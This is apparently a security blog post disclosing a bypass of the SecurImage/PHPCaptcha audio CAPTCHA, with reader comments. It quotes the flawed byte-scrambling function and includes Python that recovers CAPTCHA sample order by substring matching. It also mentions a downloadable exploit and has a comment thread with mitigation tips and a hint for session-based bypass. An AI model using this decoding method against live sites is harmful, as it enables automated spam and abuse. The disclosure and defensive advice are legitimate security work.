Recently I discovered an easy way to bypass PHPCaptcha, also known as SecurImage. The method described below breaks the CAPTCHA every time, without fail, and affects versions 1.0.4 and above. Previous versions are probably also vulnerable, though exploit code is only provided for the MP3 file format (the default since version 2.0.0).
The flaw in the CAPTCHA stems from the way the MP3 and WAV audio codes, intended for use by the visually impaired, are generated. It is worth noting that even when the site owner has removed the audio functionality from the displayed CAPTCHA, it can still be reached by forceful browsing to the file “/securimage_play.php”. This means that unless the site administrator has removed the securimage_play.php file, their site is vulnerable to attack.
The audio codes generated by PHPCaptcha are created by concatenating a set of audio files (publicly accessible in the /audio directory). To prevent simple binary analysis of the output, the author randomly changes the value of every 64th byte in the generated audio file, starting from an initial offset that is itself a random integer in the range 1-64. The effect of the mutation is that when you listen to the audio it is very hard to determine which letters are being heard. The code used for the mutation is shown below:
function scrambleAudioData(&$data, $format)
{
    if ($format == 'wav') {
        // Skip to the start of the PCM 'data' chunk. Note that the + 4 is applied
        // before the === false test, so the fallback to offset 44 can never
        // trigger (false + 4 evaluates to 4 in PHP).
        $start = strpos($data, 'data') + 4;
        if ($start === false) $start = 44;
    } else { // mp3
        $start = 4;
    }
    // Random initial offset in 1..64, then every 64th byte from there is touched.
    $start += rand(1, 64);
    // The final 256 bytes are never touched; the loop bound is a length rather
    // than an end index, so even fewer bytes are reached than intended.
    $datalen = strlen($data) - $start - 256;
    for ($i = $start; $i < $datalen; $i += 64) {
        $ch = ord($data[$i]); // the original uses the $data{$i} offset syntax, removed in PHP 8
        // Only byte values in 9..119 are mutated, and by at most +/- 8.
        if ($ch < 9 || $ch > 119) continue;
        $data[$i] = chr($ch + rand(-8, 8));
    }
}
While this prevents simple binary analysis of the generated audio, it does not prevent an attacker from building a list of 64-byte strings from the publicly accessible audio samples and comparing them against the concatenated audio file. By determining where in the file these strings occur it is possible to decode the CAPTCHA with a 100% success rate. The author's decision to change only every 64th byte of the final audio file is a fatal design flaw.
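To make the flaw concrete, here is an added example (not the post's exploit and not SecurImage's own code) that ports the MP3 branch of scrambleAudioData() to Python and runs it over constructed data: a few random byte strings stand in for the public /audio samples, a constructed 4-byte prefix stands in for the MP3 header, and the "CAPTCHA" is a constructed sequence of sample indices with one repeat. It then measures how many bytes the mutation actually alters (never more than 1 in 64) and recovers the sample order by exact substring matching. The matching window is 63 bytes rather than the post's 64, a choice made here so that a window always fits between two consecutive mutation points; the match position minus the window's offset inside its sample gives the start of that sample instance, which is what separates repeated letters.

```python
import random

# Constructed 4-byte prefix standing in for the MP3 header the PHP code skips
# over (the mp3 branch starts at offset 4 regardless of the header's contents).
HEADER = b"\xff\xfb\x90\x00"


def scramble_mp3(data: bytes, rng: random.Random) -> bytes:
    """Python port of the MP3 branch of SecurImage's scrambleAudioData()."""
    out = bytearray(data)
    start = 4 + rng.randint(1, 64)      # $start = 4; $start += rand(1, 64);
    datalen = len(out) - start - 256    # loop bound is a length, as in the PHP
    for i in range(start, datalen, 64):
        ch = out[i]
        if ch < 9 or ch > 119:          # only byte values 9..119 are touched
            continue
        out[i] = (ch + rng.randint(-8, 8)) & 0xFF
    return bytes(out)


def make_samples(count: int, length: int, rng: random.Random) -> list[bytes]:
    """Constructed stand-ins for the public /audio files: random bytes kept in
    the 9..119 range so that every byte is eligible for mutation (worst case)."""
    return [bytes(rng.randint(9, 119) for _ in range(length)) for _ in range(count)]


def changed_fraction(original: bytes, scrambled: bytes) -> float:
    """Fraction of bytes the scramble actually altered (never more than 1/64)."""
    return sum(a != b for a, b in zip(original, scrambled)) / len(original)


def recover_sequence(samples: list[bytes], scrambled: bytes, window: int = 63) -> list[int]:
    """Locate each sample in the scrambled output by exact substring matching.

    Consecutive mutated bytes are 64 apart, so 63 untouched bytes always lie
    between them; any 63-byte slice of a sample that falls in such a gap is
    present verbatim. Each matching window implies where its sample instance
    starts (position - offset within sample), which also separates repeats.
    """
    index: dict[bytes, tuple[int, int]] = {}
    for sid, s in enumerate(samples):
        for off in range(len(s) - window + 1):
            index.setdefault(s[off:off + window], (sid, off))
    starts: dict[int, int] = {}
    for p in range(len(scrambled) - window + 1):
        hit = index.get(scrambled[p:p + window])
        if hit is not None:
            sid, off = hit
            starts.setdefault(p - off, sid)
    return [starts[k] for k in sorted(starts)]


def demo(seed: int = 1) -> dict:
    """Build a constructed CAPTCHA, scramble it, and try to recover it."""
    rng = random.Random(seed)
    samples = make_samples(6, 1000, rng)
    sequence = [2, 0, 2, 5, 1]          # constructed "CAPTCHA" with a repeated letter
    message = HEADER + b"".join(samples[i] for i in sequence)
    scrambled = scramble_mp3(message, rng)
    return {
        "expected": sequence,
        "recovered": recover_sequence(samples, scrambled),
        "changed_fraction": changed_fraction(message, scrambled),
    }


if __name__ == "__main__":
    print(demo())
```

Running demo() shows the recovered order equal to the constructed one and a changed fraction of about 1.4%, which is the whole point: a mutation that leaves 63 of every 64 bytes untouched cannot hide which public sample each stretch of the output came from, however loud the result sounds.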
You can download the PHPCaptcha exploit capable of decoding the MP3 CAPTCHA format. It is currently configured to run against the “sample_form.php” script that comes by default with SecurImage / PHPCaptcha. Below is a video of the exploit running:
No fix is currently available from the author. The only current solution is to remove the securimage_play.php script from your site.
Thanks so much Phil! Keep up the good hack.
Two thumbs up.
Good one :D and thanks for bringing it to my notice! I’ll put up a warning against this too..
Cheers,
m^e
If you know how to patch this so the audio still works and can be secure, please contact me. http://www.fastsecurecontactform.com/contact
Thanks
Mike Challis
Hi Mike,
Without a substantial re-write of the audio component of securecaptcha there is no way to fix the script so that it cannot be decoded.
The author will need to put the same amount of effort into mutating the audio as he has done for the visual component of the captcha. This is compounded by the fact that there doesn't appear to be any easy way of generating MP3 files using PHP.
Phil.
The link to DLing the zip is dead.
Fixed, sorry about that.
Thanks for this entry. We are getting some spam and guessed that it could be caused by this exploit. We removed read permissions from the “securimage_play.php” file, but spam is still coming through. Is it possible that there’s another similar bug?
If you're seeing a high hit rate for the securimage_play.php file within your Apache web logs then it's entirely possible the spammer is using this technique. As far as I’m aware there are no other issues with PHPCaptcha – you might want to try altering the parameters for the image generation to make the CAPTCHA harder to read, although this won’t provide any protection against “Human Sweatshop Relay Attacks” such as deathbycaptcha.com. By combining Akismet (akismet.com) with your CAPTCHA you might be able to provide more defence in depth against spam.
Make sure that you have the .htaccess file filled with “deny from all” in your “/securimage/database/” folder.
If you are not using Apache as server, it’s possible that you need to set the exclusion manually on this folder/path for anyone except the dedicated user for running the PHP Scripts.
Wish this helps!
thanks for making it available to all hackers
It took him a long time, but PHPCaptcha 3.0 is out. Are you going to test it also?
PHPCaptcha version 3.0 is also vulnerable – exploit to follow shortly. Watch this space.
I’m watching… tested it yet? He claims that it “fixes a vulnerability with mp3 audio files”….
Similar problems exist with 3.0 – version 3.2 might actually be ok as far as the Audio goes :)
Any updates for the 3.0 exploit? Is there a proof of concept like this one?
Any updates on version 3.2? Has the issue been fixed? Any other vulnerabilities?
If you use a small audio set to generate a CAPTCHA you can easily decode it. Admittedly it's not quite as simple as a binary comparison; you’ll need to turn the audio into a spectrogram using an FFT and then compare it. These guys did it pretty well: http://www.dc949.org/projects/stiltwalker/
Is there any way to use this in a session? I have a session where I have to bypass a captcha in the middle of it.
You’ll have to fetch the Audio file using the same session ID that you use to submit the captcha protected form, in PHP curl is probably your best bet.
So does that mean hackers can still exploit the audio captcha in version 3.2? Any ways to prevent it?
Audio CAPTCHAs don’t appear to be easy things to create. Ideally you need a huge audio library to make the classification of sounds harder – with SecurImage the sound library is ~30 sounds, which makes classification easy. So hackers could exploit version 3.2. However, with the exception of Stiltwalker I’m not aware of any public exploits for it yet, although it's probably just a question of time.